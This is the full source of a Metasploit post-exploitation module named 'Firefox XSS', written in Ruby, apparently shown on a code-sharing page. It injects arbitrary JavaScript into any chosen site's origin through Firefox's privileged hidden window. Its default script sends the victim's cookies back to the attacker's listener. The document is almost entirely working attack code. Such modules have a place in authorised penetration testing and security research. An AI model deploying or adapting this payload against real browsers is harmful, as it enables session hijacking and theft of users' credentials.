Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Payload::Firefox
10
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Firefox XSS',
17
        'Description' => %q{
18
          This module runs the provided SCRIPT as javascript in the
19
          origin of the provided URL. It works by navigating to a hidden
20
          ChromeWindow to the URL, then injecting the SCRIPT with Function().
21
          The callback "send(result)" is used to send data back to the listener.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [ 'joev' ],
25
        'Platform' => [ 'firefox' ]
26
      )
27
    )
28

29
    register_options([
30
      OptString.new('SCRIPT', [true, 'The javascript command to run', 'send(document.cookie)']),
31
      OptPath.new('SCRIPTFILE', [false, 'The javascript file to run']),
32
      OptString.new('URL', [
33
        true, 'URL to inject into', 'https://metasploit.com'
34
      ]),
35
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
36
    ])
37
  end
38

39
  def run
40
    results = js_exec(js_payload)
41
    if results.present?
42
      print_good results
43
    else
44
      print_error 'No response received'
45
    end
46
  end
47

48
  def js_payload
49
    js = datastore['SCRIPT'].strip
50
    %|
51

52
      (function(send){
53
        #{set_timeout_source}
54

55
        var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
56
                               .getService(Components.interfaces.nsIAppShellService)
57
                               .hiddenDOMWindow;
58

59
        hiddenWindow.location = 'about:blank';
60
        var src = (#{JSON.unparse({ src: js })}).src;
61
        var key = "#{Rex::Text.rand_text_alphanumeric(rand(8..19))}";
62

63
        hiddenWindow[key] = true;
64
        hiddenWindow.location = "#{datastore['URL']}";
65

66
        var evt = function() {
67
          if (hiddenWindow[key]) {
68
            setTimeout(evt, 200);
69
          } else {
70
            setTimeout(function(){
71
              try {
72
                send(hiddenWindow.wrappedJSObject.Function('send', src)(send));
73
              } catch (e) {
74
                send("Error: "+e.message);
75
              }
76
            }, 500);
77
          }
78
        };
79

80
        setTimeout(evt, 200);
81
      })(this.send);
82

83
    |.strip
84
  end
85
end
86

87